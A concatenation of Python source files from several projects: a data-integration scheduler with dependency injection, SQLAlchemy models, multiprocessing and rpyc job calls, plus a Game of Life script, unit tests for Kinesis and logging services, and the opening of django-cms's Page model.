@staticmethod
def set_database_application_name():
application_config = IocManager.config_manager.get(ApplicationConfig)
database_config: DatabaseConfig = IocManager.config_manager.get(DatabaseConfig)
if database_config.application_name is None:
process_info = IocManager.get_process_info()
hostname = os.getenv('HOSTNAME', '')
IocManager.config_manager.set(ApplicationConfig, "hostname", hostname)
IocManager.config_manager.set(DatabaseConfig, "application_name",
f"{application_config.name}-({process_info})")
@staticmethod
def run():
process_service = IocManager.process_service()
process_rpc_server_config: ProcessRpcServerConfig = IocManager.config_manager.get(ProcessRpcServerConfig)
process_service.initialize(process_rpc_server_config=process_rpc_server_config)
@staticmethod
def configure(binder: Binder):
IocManager.binder = binder
for config in IocManager.config_manager.get_all():
binder.bind(
config.get("type"),
to=config.get("instance"),
scope=singleton,
)
for singletonScope in ISingleton.__subclasses__():
binder.bind(
singletonScope,
to=singletonScope,
scope=singleton,
)
for scoped in IScoped.__subclasses__():
binder.bind(
scoped,
to=scoped,
scope=threadlocal,
)
@staticmethod
def get_process_info():
return f"{current_process().name} ({os.getpid()},{os.getppid()})"
@staticmethod
def process_info():
logger = ConsoleLogger()
application_config: ApplicationConfig = IocManager.config_manager.get(ApplicationConfig)
        hostname = f'-{application_config.hostname}' if (application_config.hostname is not None and application_config.hostname != '') else ''
logger.info(f"Application : {application_config.name}{hostname}")
```
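Dependency scopes are resolved by subclassing: anything deriving from `ISingleton` is bound once per process, anything deriving from `IScoped` gets threadlocal scope. A toy sketch of how a new class opts in, assuming the scope bases act as plain marker types (`MyCache` and `MyService` are invented names):
```python
# Toy opt-in example; MyCache and MyService are invented names.
from infrastructor.dependency.scopes import ISingleton, IScoped


class MyCache(ISingleton):  # one shared instance per process
    pass


class MyService(IScoped):  # a fresh instance per thread (threadlocal scope)
    pass

# After IocManager.initialize(), both resolve through the shared injector:
# cache = IocManager.injector.get(MyCache)
# service = IocManager.injector.get(MyService)
```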
#### File: base/aps/ApSchedulerJobsTable.py
```python
from infrastructor.json.BaseConverter import BaseConverter
@BaseConverter.register
class ApSchedulerJobsTableBase:
def __init__(self,
id: str = None,
next_run_time: float = None,
job_state=None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.id: str = id
self.next_run_time: float = next_run_time
self.job_state = job_state
```
#### File: base/integration/DataIntegrationConnectionDatabaseBase.py
```python
from models.base.EntityBase import EntityBase
from infrastructor.json.BaseConverter import BaseConverter
@BaseConverter.register
class DataIntegrationConnectionDatabaseBase(EntityBase):
def __init__(self,
DataIntegrationConnectionId: int = None,
Schema: str = None,
TableName: str = None,
Query: str = None,
DataIntegrationConnection=None,
*args, **kwargs):
super().__init__(*args, **kwargs)
        self.DataIntegrationConnectionId: int = DataIntegrationConnectionId
self.Schema: str = Schema
self.TableName: str = TableName
self.Query: str = Query
self.DataIntegrationConnection = DataIntegrationConnection
```
#### File: base/operation/DefinitionBase.py
```python
from models.base.EntityBase import EntityBase
from infrastructor.json.BaseConverter import BaseConverter
@BaseConverter.register
class DefinitionBase(EntityBase):
def __init__(self,
Name: str = None,
Version: int = None,
Content: str = None,
IsActive: bool = None,
                 DataOperations=None,
                 DataIntegrations=None,
                 DataOperationJobExecutions=None,
                 *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Avoid the shared-mutable-default pitfall: a literal [] default would
        # be reused across every instance constructed without a value.
        self.DataOperationJobExecutions = DataOperationJobExecutions if DataOperationJobExecutions is not None else []
        self.DataIntegrations = DataIntegrations if DataIntegrations is not None else []
        self.DataOperations = DataOperations if DataOperations is not None else []
self.Name: str = Name
self.Version: int = Version
self.Content: str = Content
self.IsActive: bool = IsActive
```
#### File: models/dto/ConnectionBasicAuthentication.py
```python
class ConnectionBasicAuthentication:
def __init__(self,
User: str = None,
Password: str = None,
):
self.User: str = User
self.Password: str = Password
```
#### File: viewmodels/connection/CreateConnectionServerModel.py
```python
from infrastructor.json.JsonConvert import JsonConvert
@JsonConvert.register
class CreateConnectionServerModel:
def __init__(self,
Host: str = None,
Port: int = None,
):
self.Host: str = Host
self.Port: int = Port
```
#### File: viewmodels/integration/CreateDataIntegrationConnectionDatabaseModel.py
```python
from infrastructor.json.JsonConvert import JsonConvert
@JsonConvert.register
class CreateDataIntegrationConnectionDatabaseModel:
def __init__(self,
Schema: str = None,
TableName: str = None,
Query: str = None,
):
self.Schema: str = Schema
self.TableName: str = TableName
self.Query: str = Query
```
#### File: process/rpc/OperationProcess.py
```python
import time
import traceback
from IocManager import IocManager
from datetime import datetime
from domain.operation.execution.services.OperationExecution import OperationExecution
from domain.operation.services.DataOperationJobService import DataOperationJobService
from infrastructor.data.RepositoryProvider import RepositoryProvider
from infrastructor.data.decorators.TransactionHandler import transaction_handler
from infrastructor.logging.SqlLogger import SqlLogger
from multiprocessing.context import Process
from models.dao.operation import DataOperation
class OperationProcess:
@transaction_handler
def start(self, data_operation_id: int, job_id: int, data_operation_job_execution_id: int):
start = time.time()
start_datetime = datetime.now()
sql_logger = SqlLogger()
sql_logger.info(f"{data_operation_id}-{job_id} Data Operations Started",
job_id=data_operation_job_execution_id)
try:
IocManager.injector.get(OperationExecution).start(data_operation_id=data_operation_id, job_id=job_id,
data_operation_job_execution_id=data_operation_job_execution_id)
sql_logger.info(
f"{data_operation_id}-{job_id} Data Operations Finished",
job_id=data_operation_job_execution_id)
except Exception as ex:
exc = traceback.format_exc() + '\n' + str(ex)
sql_logger.info(
f"{data_operation_id}-{job_id} Data Operations Finished With Error: {exc}",
job_id=data_operation_job_execution_id)
finally:
IocManager.injector.get(DataOperationJobService).check_removed_job(ap_scheduler_job_id=job_id)
end_datetime = datetime.now()
end = time.time()
sql_logger.info(
f"{data_operation_id}-{job_id} Start :{start_datetime} - End :{end_datetime} - ElapsedTime :{end - start}",
job_id=data_operation_job_execution_id)
del sql_logger
@staticmethod
def start_process(data_operation_id: int, job_id: int, data_operation_job_execution_id: int):
IocManager.initialize()
operation_process = OperationProcess()
operation_process.start(data_operation_id=data_operation_id, job_id=job_id,
data_operation_job_execution_id=data_operation_job_execution_id)
del operation_process
@transaction_handler
def start_operation_process(self, data_operation_id: int, job_id: int, data_operation_job_execution_id: int):
"""
:param job_id: Ap Scheduler Job Id
:param data_operation_id: Data Operation Id
:return:
"""
start = time.time()
start_datetime = datetime.now()
sql_logger = SqlLogger()
data_operation_query = IocManager.injector.get(RepositoryProvider).get(DataOperation).filter_by(
Id=data_operation_id)
data_operation = data_operation_query.first()
if data_operation is None:
raise Exception('Operation Not Found')
sql_logger.info(f"{data_operation_id}-{job_id}-{data_operation.Name} Execution Create started",
job_id=data_operation_job_execution_id)
operation_process = Process(target=OperationProcess.start_process,
args=(data_operation_id, job_id, data_operation_job_execution_id))
operation_process.start()
end_datetime = datetime.now()
end = time.time()
sql_logger.info(
f"{data_operation_id}-{job_id}-{data_operation.Name} Execution Create finished. Start :{start_datetime} - End :{end_datetime} - ElapsedTime :{end - start}",
job_id=data_operation_job_execution_id)
IocManager.injector.get(RepositoryProvider).close()
return
```
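Note the pattern in `start_operation_process`: the operation runs in a separate `multiprocessing.Process`, and the child's entry point (`start_process`) calls `IocManager.initialize()` again, since a child created with the `spawn` start method does not share the parent's configured injector. A standalone sketch of the same spawn-and-reinitialize pattern (names here are illustrative, not the project's):

```python
from multiprocessing import Process, set_start_method

def init_container():
    # stands in for IocManager.initialize(): rebuild per-process state
    print("container initialized in child")

def run_operation(operation_id: int):
    init_container()  # a spawned child must rebuild its own container
    print(f"running operation {operation_id}")

if __name__ == "__main__":
    set_start_method("spawn", force=True)
    worker = Process(target=run_operation, args=(42,))
    worker.start()
    worker.join()
```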
#### File: infrastructor/dependency/scopes.py
```python
class IDependency:
    """Marker base class for everything managed by the injector."""


class IScoped(IDependency):
    """Marker for services bound with thread-local scope by IocManager."""

    def __init__(self):
        pass  # lifecycle hook kept for debugging scoped construction

    def __del__(self):
        pass  # lifecycle hook kept for debugging scoped destruction


class ISingleton(IDependency):
    """Marker for services bound with singleton scope by IocManager."""
```
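These marker classes only matter through `__subclasses__()`: `IocManager.configure` walks them and picks the binding scope. A self-contained sketch of that mechanism using only the real `injector` package (the service classes here are hypothetical, defined just for the demo):

```python
from injector import Injector, Binder, singleton, threadlocal

class IDependency: pass
class ISingleton(IDependency): pass
class IScoped(IDependency): pass

class Clock(ISingleton):        # hypothetical singleton service
    pass

class RequestContext(IScoped):  # hypothetical per-thread service
    pass

def configure(binder: Binder):
    for cls in ISingleton.__subclasses__():
        binder.bind(cls, to=cls, scope=singleton)
    for cls in IScoped.__subclasses__():
        binder.bind(cls, to=cls, scope=threadlocal)

injector = Injector(configure)
assert injector.get(Clock) is injector.get(Clock)  # singletons share one instance
assert injector.get(RequestContext) is injector.get(RequestContext)  # same within one thread
```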
#### File: multi_processing/models/ProcessInfo.py
```python
import multiprocessing
class ProcessInfo:
def __init__(self,
                 Process: multiprocessing.Process = None,
SubProcessId: int = None,
IsFinished: bool = False):
self.Process: multiprocessing.Process = Process
self.SubProcessId: int = SubProcessId
self.IsFinished: bool = IsFinished
```
#### File: multi_processing/models/ProcessTask.py
```python
class ProcessTask:
def __init__(self,
Data: any = None,
SubProcessId: int = None,
IsFinished: bool = None,
IsProcessed: bool = None,
State: int = None,
Result: any = None,
Message: str = None,
Exception: Exception = None,
                 Traceback: str = None):
self.Data: any = Data
self.SubProcessId: int = SubProcessId
self.IsFinished: bool = IsFinished
self.IsProcessed: bool = IsProcessed
self.State: int = State
self.Result: any = Result
self.Message: str = Message
self.Exception: Exception = Exception
self.Traceback: str = Traceback
```
#### File: models/configs/ApsConfig.py
```python
from models.configs.BaseConfig import BaseConfig
class ApsConfig(BaseConfig):
def __init__(self,
                 coalesce: bool = None,
                 max_instances: int = None,
                 thread_pool_executer_count: int = None,
                 process_pool_executer_count: int = None,
                 default_misfire_grace_time_date_job: int = None,
                 default_misfire_grace_time_cron_job: int = None
                 ):
self.process_pool_executer_count = process_pool_executer_count
self.thread_pool_executer_count = thread_pool_executer_count
self.max_instances = max_instances
self.coalesce = coalesce
self.default_misfire_grace_time_date_job = default_misfire_grace_time_date_job
self.default_misfire_grace_time_cron_job = default_misfire_grace_time_cron_job
def is_valid(self):
pass
```
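These fields mirror APScheduler's standard tuning knobs. A hedged sketch of how they would typically be wired into a scheduler (the project's actual scheduler setup is outside this excerpt; the fallback values are arbitrary):

```python
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.executors.pool import ThreadPoolExecutor, ProcessPoolExecutor
from models.configs.ApsConfig import ApsConfig

def build_scheduler(cfg: ApsConfig) -> BackgroundScheduler:
    executors = {
        'default': ThreadPoolExecutor(cfg.thread_pool_executer_count or 10),
        'processpool': ProcessPoolExecutor(cfg.process_pool_executer_count or 3),
    }
    job_defaults = {
        'coalesce': bool(cfg.coalesce),
        'max_instances': cfg.max_instances or 1,
    }
    return BackgroundScheduler(executors=executors, job_defaults=job_defaults)
```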
#### File: dao/connection/ConnectionQueue.py
```python
from sqlalchemy import Column, String, Integer, ForeignKey
from sqlalchemy.orm import relationship
from IocManager import IocManager
from models.dao.Entity import Entity
class ConnectionQueue(Entity, IocManager.Base):
__tablename__ = "ConnectionQueue"
__table_args__ = {"schema": "Connection"}
ConnectionId = Column(Integer, ForeignKey('Connection.Connection.Id'))
ConnectorTypeId = Column(Integer, ForeignKey('Connection.ConnectorType.Id'))
Protocol = Column(String(100), index=False, unique=False, nullable=True)
Mechanism = Column(String(100), index=False, unique=False, nullable=True)
ConnectorType = relationship("ConnectorType", back_populates="Queues")
def __init__(self,
ConnectionId: int = None,
ConnectorTypeId: int = None,
Protocol: str = None,
Mechanism: str = None,
Connection=None,
ConnectorType=None,
*args, **kwargs):
super().__init__(*args, **kwargs)
        self.ConnectionId: int = ConnectionId
        self.ConnectorTypeId: int = ConnectorTypeId
self.Protocol: str = Protocol
self.Mechanism: str = Mechanism
self.Connection = Connection
self.ConnectorType = ConnectorType
```
#### File: dao/connection/ConnectionSecret.py
```python
from sqlalchemy import Column, Integer, ForeignKey
from sqlalchemy.orm import relationship
from IocManager import IocManager
from models.dao.Entity import Entity
class ConnectionSecret(Entity, IocManager.Base):
__tablename__ = "ConnectionSecret"
__table_args__ = {"schema": "Connection"}
ConnectionId = Column(Integer, ForeignKey('Connection.Connection.Id'))
SecretId = Column(Integer, ForeignKey('Secret.Secret.Id'))
Connection = relationship("Connection", back_populates="ConnectionSecrets")
Secret = relationship("Secret", back_populates="ConnectionSecrets")
def __init__(self,
ConnectionId: int = None,
SecretId: int = None,
Connection=None,
Secret=None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.ConnectionId: int = ConnectionId
self.SecretId: int = SecretId
self.Connection = Connection
self.Secret = Secret
```
#### File: dao/connection/ConnectionType.py
```python
from typing import List
from sqlalchemy import Column, String
from sqlalchemy.orm import relationship
from IocManager import IocManager
from models.dao.connection.Connection import Connection
from models.dao.connection.ConnectorType import ConnectorType
from models.dao.Entity import Entity
class ConnectionType(Entity, IocManager.Base):
__tablename__ = "ConnectionType"
__table_args__ = {"schema": "Connection"}
Name = Column(String(100), index=False, unique=True, nullable=False)
Connectors: List[ConnectorType] = relationship("ConnectorType",
back_populates="ConnectionType")
Connections: List[Connection] = relationship("Connection",
back_populates="ConnectionType")
    def __init__(self,
                 Name: str = None,
                 *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.Name: str = Name
```
#### File: dao/integration/DataIntegrationColumn.py
```python
from sqlalchemy import Column, String, Integer, ForeignKey
from sqlalchemy.orm import relationship
from IocManager import IocManager
from models.dao.Entity import Entity
class DataIntegrationColumn(Entity, IocManager.Base):
__tablename__ = "DataIntegrationColumn"
__table_args__ = {"schema": "Integration"}
DataIntegrationId = Column(Integer, ForeignKey('Integration.DataIntegration.Id'))
ResourceType = Column(String(100), index=False, unique=False, nullable=True)
SourceColumnName = Column(String(100), index=False, unique=False, nullable=True)
TargetColumnName = Column(String(100), index=False, unique=False, nullable=True)
DataIntegration = relationship("DataIntegration", back_populates="Columns")
def __init__(self,
ResourceType: str = None,
SourceColumnName: str = None,
TargetColumnName: str = None,
DataIntegration=None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.ResourceType: str = ResourceType
self.SourceColumnName: str = SourceColumnName
self.TargetColumnName: str = TargetColumnName
self.DataIntegration = DataIntegration
```
#### File: dao/operation/DataOperationIntegration.py
```python
from typing import List
from sqlalchemy import Column, Integer, ForeignKey
from sqlalchemy.orm import relationship
from IocManager import IocManager
from models.dao.Entity import Entity
from models.dao.operation.DataOperationJobExecutionIntegration import DataOperationJobExecutionIntegration
class DataOperationIntegration(Entity, IocManager.Base):
__tablename__ = "DataOperationIntegration"
__table_args__ = {"schema": "Operation"}
DataOperationId = Column(Integer, ForeignKey('Operation.DataOperation.Id'))
DataIntegrationId = Column(Integer, ForeignKey('Integration.DataIntegration.Id'))
Order = Column(Integer, index=False, unique=False, nullable=False)
Limit = Column(Integer, index=False, unique=False, nullable=False)
ProcessCount = Column(Integer, index=False, unique=False, nullable=False)
DataOperation = relationship("DataOperation", back_populates="Integrations")
DataIntegration = relationship("DataIntegration", back_populates="DataOperationIntegrations")
DataOperationJobExecutionIntegrations: List[DataOperationJobExecutionIntegration] = relationship(
"DataOperationJobExecutionIntegration",
back_populates="DataOperationIntegration")
def __init__(self,
DataOperationId: int = None,
DataIntegrationId: int = None,
Order: int = None,
Limit: int = None,
ProcessCount: int = None,
DataOperation=None,
DataIntegration=None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.DataOperationId: int = DataOperationId
self.DataIntegrationId: int = DataIntegrationId
self.Order: int = Order
self.Limit: int = Limit
self.ProcessCount: int = ProcessCount
self.DataOperation = DataOperation
self.DataIntegration = DataIntegration
```
#### File: dao/operation/DataOperationJobExecutionIntegration.py
```python
from datetime import datetime
from typing import List
from sqlalchemy import Column, Integer, ForeignKey, DateTime, String
from sqlalchemy.orm import relationship
from IocManager import IocManager
from models.dao.Entity import Entity
from models.dao.operation.DataOperationJobExecutionIntegrationEvent import DataOperationJobExecutionIntegrationEvent
class DataOperationJobExecutionIntegration(Entity, IocManager.Base):
__tablename__ = "DataOperationJobExecutionIntegration"
__table_args__ = {"schema": "Operation"}
DataOperationJobExecutionId = Column(Integer, ForeignKey('Operation.DataOperationJobExecution.Id'))
DataOperationIntegrationId = Column(Integer, ForeignKey('Operation.DataOperationIntegration.Id'))
StatusId = Column(Integer, ForeignKey('Common.Status.Id'))
StartDate = Column(DateTime, index=False, unique=False, nullable=False, default=datetime.now)
EndDate = Column(DateTime, index=False, unique=False, nullable=True)
Limit = Column(Integer, index=False, unique=False, nullable=True)
ProcessCount = Column(Integer, index=False, unique=False, nullable=True)
SourceDataCount = Column(Integer, index=False, unique=False, nullable=True)
Log = Column(String(1000), index=False, unique=False, nullable=True)
Status = relationship("Status", back_populates="DataOperationJobExecutionIntegrations")
DataOperationIntegration = relationship("DataOperationIntegration",
back_populates="DataOperationJobExecutionIntegrations")
DataOperationJobExecution = relationship("DataOperationJobExecution",
back_populates="DataOperationJobExecutionIntegrations")
DataOperationJobExecutionIntegrationEvents: List[DataOperationJobExecutionIntegrationEvent] = relationship(
"DataOperationJobExecutionIntegrationEvent",
back_populates="DataOperationJobExecutionIntegration")
def __init__(self,
DataOperationJobExecutionId: int = None,
DataOperationIntegrationId: int = None,
StatusId: int = None,
StartDate: datetime = None,
EndDate: datetime = None,
Limit: int = None,
ProcessCount: int = None,
SourceDataCount: int = None,
Log: str = None,
DataOperationIntegration: any = None,
DataOperationJobExecution: any = None,
Status: any = None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.DataOperationJobExecutionId: int = DataOperationJobExecutionId
self.DataOperationIntegrationId: int = DataOperationIntegrationId
self.StatusId: int = StatusId
self.StartDate: datetime = StartDate
self.EndDate: datetime = EndDate
self.Limit: int = Limit
self.ProcessCount: int = ProcessCount
self.SourceDataCount: int = SourceDataCount
self.Log: str = Log
self.DataOperationIntegration: any = DataOperationIntegration
self.DataOperationJobExecution: any = DataOperationJobExecution
self.Status: any = Status
```
#### File: scheduler/rpc/ProcessRpcClientService.py
```python
import rpyc
from injector import inject
from infrastructor.dependency.scopes import IScoped
from models.configs.ProcessRpcClientConfig import ProcessRpcClientConfig
class ProcessRpcClientService(IScoped):
@inject
def __init__(self,
process_rpc_client_config: ProcessRpcClientConfig,
):
self.process_rpc_client_config = process_rpc_client_config
def connect_rpc(self):
conn = rpyc.connect(self.process_rpc_client_config.host, self.process_rpc_client_config.port)
return conn
    def call_job_start(self, data_operation_id, job_id, data_operation_job_execution_id):
        conn = self.connect_rpc()
        job = conn.root.job_start(data_operation_id, job_id, data_operation_job_execution_id)
        return job
```
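The client's `conn.root.job_start(...)` call implies a matching rpyc service on the server whose root exposes `exposed_job_start` (rpyc maps `root.<name>` to `exposed_<name>`). A hedged sketch of that counterpart, with illustrative names rather than the project's actual server service:

```python
import rpyc
from rpyc.utils.server import ThreadedServer

class ProcessRpcService(rpyc.Service):
    def exposed_job_start(self, data_operation_id, job_id, data_operation_job_execution_id):
        # hand the ids to whatever starts the operation; echoed here for the sketch
        return f"started {data_operation_id}-{job_id}-{data_operation_job_execution_id}"

if __name__ == "__main__":
    ThreadedServer(ProcessRpcService, port=18861).start()
```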
#### File: scheduler/scheduler/JobSchedulerEvent.py
```python
from queue import Queue
import jsonpickle
from handlers.JobEventHandler import JobEventHandler
from infrastructor.multi_processing.ProcessManager import ProcessManager
from scheduler.JobSchedulerService import JobSchedulerService
class JobSchedulerEvent:
job_scheduler_type = None
job_event_queue: Queue = None
process_manager: ProcessManager = None
def __del__(self):
del JobSchedulerEvent.process_manager
@staticmethod
def create_event_handler():
JobSchedulerEvent.process_manager = ProcessManager()
JobSchedulerEvent.job_event_queue = JobSchedulerEvent.process_manager.create_queue()
process_kwargs = {
"event_queue": JobSchedulerEvent.job_event_queue,
}
JobSchedulerEvent.process_manager.start_processes(target_method=JobEventHandler.start_job_event_handler_process,
kwargs=process_kwargs)
def event_service_handler(func):
def inner(*args, **kwargs):
service = JobSchedulerService()
if service.job_scheduler_type is None:
service.set_job_scheduler_type(job_scheduler_type=JobSchedulerEvent.job_scheduler_type)
if service.job_event_queue is None:
service.set_job_event_queue(job_event_queue=JobSchedulerEvent.job_event_queue)
result = func(service=service, event=args[0], **kwargs)
del service
return result
return inner
@staticmethod
@event_service_handler
def listener_job_added(service: JobSchedulerService, event, *args, **kwargs):
job = service.get_job(event.job_id)
service.add_job(event)
service.add_job_event(event)
        service.add_log(event, f'{job.name} added with func_ref:{job.func_ref}, max_instances:{job.max_instances}')
@staticmethod
@event_service_handler
def listener_job_removed(service: JobSchedulerService, event, *args, **kwargs):
service.add_job_event(event)
service.remove_job(event)
        service.add_log(event, 'Job removed')
@staticmethod
@event_service_handler
def listener_all_jobs_removed(service: JobSchedulerService, event, *args, **kwargs):
service.add_job_event(event)
service.remove_job(event)
        service.add_log(event, 'Jobs removed')
@staticmethod
@event_service_handler
def listener_finish(service: JobSchedulerService, event, *args, **kwargs):
service.add_job_event(event)
if hasattr(event, 'exception') and event.exception:
if hasattr(event, 'traceback') and event.traceback:
service.add_log(event,
f'exception:{event.exception} traceback:{event.traceback}')
else:
service.add_log(event, f'exception:{event.exception}')
else:
retval = None
if hasattr(event, 'retval') and event.retval:
retval = event.retval
retval_string = jsonpickle.encode(retval)
service.add_log(event, f'return value:{retval_string}')
@staticmethod
@event_service_handler
def listener_job_submitted(service: JobSchedulerService, event, *args, **kwargs):
job = service.get_job(event.job_id)
next_run_time = None
if hasattr(job, 'next_run_time') and job.next_run_time:
next_run_time = job.next_run_time.strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
service.add_job_event(event)
service.update_job(event)
service.add_log(event, f'Next Run Time:{next_run_time}')
@staticmethod
@event_service_handler
def listener_job_others(service: JobSchedulerService, event, *args, **kwargs):
service.add_job_event(event)
        service.add_log(event, '')
@staticmethod
@event_service_handler
def listener_scheduler_other_events(service: JobSchedulerService, event, *args, **kwargs):
        service.add_log(event, '')
```
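These static methods follow APScheduler's listener signature (a single event argument). A hedged sketch of how they would be attached to a scheduler instance (the project's actual wiring is not shown in this excerpt; the import path follows the file heading above):

```python
from apscheduler.events import (
    EVENT_JOB_ADDED, EVENT_JOB_REMOVED, EVENT_JOB_SUBMITTED,
    EVENT_JOB_EXECUTED, EVENT_JOB_ERROR,
)
from scheduler.scheduler.JobSchedulerEvent import JobSchedulerEvent

def attach_listeners(scheduler):
    scheduler.add_listener(JobSchedulerEvent.listener_job_added, EVENT_JOB_ADDED)
    scheduler.add_listener(JobSchedulerEvent.listener_job_removed, EVENT_JOB_REMOVED)
    scheduler.add_listener(JobSchedulerEvent.listener_job_submitted, EVENT_JOB_SUBMITTED)
    scheduler.add_listener(JobSchedulerEvent.listener_finish, EVENT_JOB_EXECUTED | EVENT_JOB_ERROR)
```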
#### File: integrationtests/connection/TestConnectionTypeResource.py
```python
from unittest import TestCase
from tests.integrationtests.common.TestManager import TestManager
class TestConnectionTypeResource(TestCase):
def __init__(self, methodName='TestConnectionTypeResource'):
super(TestConnectionTypeResource, self).__init__(methodName)
self.test_manager = TestManager()
def test_get_connection_type(self):
response_data = self.test_manager.service_endpoints.get_connection_type()
        self.assertTrue(response_data['IsSuccess'])
```
|
{
"source": "jedidiahhorne/game-of-life",
"score": 3
}
|
#### File: jedidiahhorne/game-of-life/game_of_life.py
```python
import config_with_yaml as config
from views import grid
def main():
"""
Get configs and invoke view.
"""
cfg = config.load("config.yaml")
size = cfg.getProperty("grid.size")
cells = cfg.getProperty("grid.initial_cells")
print(f"Initializing grid of size {size} with {cells} cells")
grid.show_grid(cfg)
input("Press Enter to continue...")
if __name__ == "__main__":
main()
```
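The script expects a `config.yaml` whose keys match the dotted `getProperty` paths above. A sketch that writes such a file with PyYAML (the size and cell-count values are arbitrary examples):

```python
import yaml

assumed_config = {"grid": {"size": 50, "initial_cells": 200}}  # example values
with open("config.yaml", "w") as fh:
    yaml.safe_dump(assumed_config, fh)
```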
|
{
"source": "jedidiahhorne/miaguila-lib",
"score": 3
}
|
#### File: ma_lib_tests/test_lib/test_kinesis_service.py
```python
from unittest import TestCase
from unittest.mock import patch, MagicMock
from miaguila.services.kinesis_service import KinesisService
class TestKinesisService(TestCase):
""" Test kinesis service """
@staticmethod
def test_kinesis_service_no_client():
""" Service should only log errors in event of connection problem """
service = KinesisService()
service.push('an event')
@patch('miaguila.services.kinesis_service.boto3')
def test_kinesis_service_client_ok(self, mock_boto3):
""" Service should only log errors in event of connection problem """
mock_boto3.client = MagicMock(return_value='boto client')
service = KinesisService()
self.assertEqual(
service._client, # pylint: disable=protected-access
'boto client',
msg='Service should instantiate client')
self.assertIsNone(
service._stream, # pylint: disable=protected-access
msg='Empty stream if settings not configured')
@staticmethod
@patch('miaguila.services.kinesis_service.boto3')
def test_kinesis_service_client_with_stream_can_push(mock_boto3):
""" Service should only log errors in event of connection problem """
mock_client = MagicMock()
mock_client.put_record = MagicMock()
mock_boto3.client = MagicMock(return_value=mock_client)
service = KinesisService()
service._stream = 'a stream' # pylint: disable=protected-access
service.push('an event')
@staticmethod
@patch('miaguila.services.kinesis_service.boto3')
def test_kinesis_service_client_with_stream_okay_if_error(mock_boto3):
""" Service should only log errors in event of connection problem """
mock_client = MagicMock()
mock_client.put_record = MagicMock()
mock_client.put_record.side_effect = Exception('Kinesis fail')
mock_boto3.client = MagicMock(return_value=mock_client)
service = KinesisService()
service._stream = 'a stream' # pylint: disable=protected-access
service.push('an event should only log if errors')
```
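The tests pin down the service's contract: it exposes private `_client` and `_stream` attributes, `push()` is a no-op without a stream, and any `put_record` failure is swallowed and logged. A hedged reconstruction consistent with those tests (the real miaguila implementation is not shown here):

```python
import json
import logging
import boto3

class KinesisService:
    """Sketch only: shape inferred from the tests above."""

    def __init__(self, stream: str = None):
        self._stream = stream  # empty until settings configure it
        try:
            self._client = boto3.client('kinesis')
        except Exception:
            self._client = None
            logging.exception('could not create kinesis client')

    def push(self, event):
        if not self._client or not self._stream:
            return  # nothing to do; only log problems, never raise
        try:
            self._client.put_record(
                StreamName=self._stream,
                Data=json.dumps({'event': event}).encode(),
                PartitionKey='default',
            )
        except Exception:
            logging.exception('kinesis push failed')
```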
#### File: ma_lib_tests/test_lib/test_logger.py
```python
from unittest.mock import patch, MagicMock
from miaguila.logging.logger import logger
class TestLogger:
""" Basic log functionality """
@staticmethod
@patch('miaguila.logging.logger.requests')
def test_logger_no_data(mock_requests):
""" Log should work """
mock_requests.post = MagicMock()
logger.log('a dummy log')
@staticmethod
@patch('miaguila.logging.logger.requests')
def test_logger_some_data(mock_requests):
""" Log should work """
mock_requests.post = MagicMock()
logger.log('a dummy log', data={'some_item': 'some_log'})
@staticmethod
@patch('miaguila.logging.logger.requests')
def test_logger_error_does_nothing(mock_requests):
""" Log should work """
mock_post = MagicMock()
mock_post.side_effect = Exception('post did not work')
mock_requests.post = mock_post
logger.log('a dummy log that does not error')
```
|
{
"source": "jedie/django-cms",
"score": 2
}
|
#### File: cms/models/pagemodel.py
```python
import copy
import warnings
from collections import OrderedDict
from logging import getLogger
from os.path import join
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
from django.db import models
from django.db.models.functions import Concat
from django.utils.encoding import force_text, python_2_unicode_compatible
from django.utils.functional import cached_property
from django.utils.timezone import now
from django.utils.translation import (
get_language,
override as force_language,
ugettext_lazy as _,
)
from cms import constants
from cms.constants import PUBLISHER_STATE_DEFAULT, PUBLISHER_STATE_PENDING, PUBLISHER_STATE_DIRTY, TEMPLATE_INHERITANCE_MAGIC
from cms.exceptions import PublicIsUnmodifiable, PublicVersionNeeded, LanguageError
from cms.models.managers import PageManager, PageNodeManager
from cms.utils import i18n
from cms.utils.conf import get_cms_setting
from cms.utils.page import get_clean_username
from cms.utils.i18n import get_current_language
from menus.menu_pool import menu_pool
from treebeard.mp_tree import MP_Node
logger = getLogger(__name__)
@python_2_unicode_compatible
class Page(models.Model):
"""
A simple hierarchical page model
"""
LIMIT_VISIBILITY_IN_MENU_CHOICES = (
(constants.VISIBILITY_USERS, _('for logged in users only')),
(constants.VISIBILITY_ANONYMOUS, _('for anonymous users only')),
)
TEMPLATE_DEFAULT = TEMPLATE_INHERITANCE_MAGIC if get_cms_setting('TEMPLATE_INHERITANCE') else get_cms_setting('TEMPLATES')[0][0]
X_FRAME_OPTIONS_INHERIT = constants.X_FRAME_OPTIONS_INHERIT
X_FRAME_OPTIONS_DENY = constants.X_FRAME_OPTIONS_DENY
X_FRAME_OPTIONS_SAMEORIGIN = constants.X_FRAME_OPTIONS_SAMEORIGIN
X_FRAME_OPTIONS_ALLOW = constants.X_FRAME_OPTIONS_ALLOW
X_FRAME_OPTIONS_CHOICES = (
(constants.X_FRAME_OPTIONS_INHERIT, _('Inherit from parent page')),
(constants.X_FRAME_OPTIONS_DENY, _('Deny')),
(constants.X_FRAME_OPTIONS_SAMEORIGIN, _('Only this website')),
(constants.X_FRAME_OPTIONS_ALLOW, _('Allow'))
)
template_choices = [(x, _(y)) for x, y in get_cms_setting('TEMPLATES')]
created_by = models.CharField(
_("created by"), max_length=constants.PAGE_USERNAME_MAX_LENGTH,
editable=False)
changed_by = models.CharField(
_("changed by"), max_length=constants.PAGE_USERNAME_MAX_LENGTH,
editable=False)
creation_date = models.DateTimeField(auto_now_add=True)
changed_date = models.DateTimeField(auto_now=True)
publication_date = models.DateTimeField(_("publication date"), null=True, blank=True, help_text=_(
'When the page should go live. Status must be "Published" for page to go live.'), db_index=True)
publication_end_date = models.DateTimeField(_("publication end date"), null=True, blank=True,
help_text=_('When to expire the page. Leave empty to never expire.'),
db_index=True)
#
# Please use toggle_in_navigation() instead of affecting this property
# directly so that the cms page cache can be invalidated as appropriate.
#
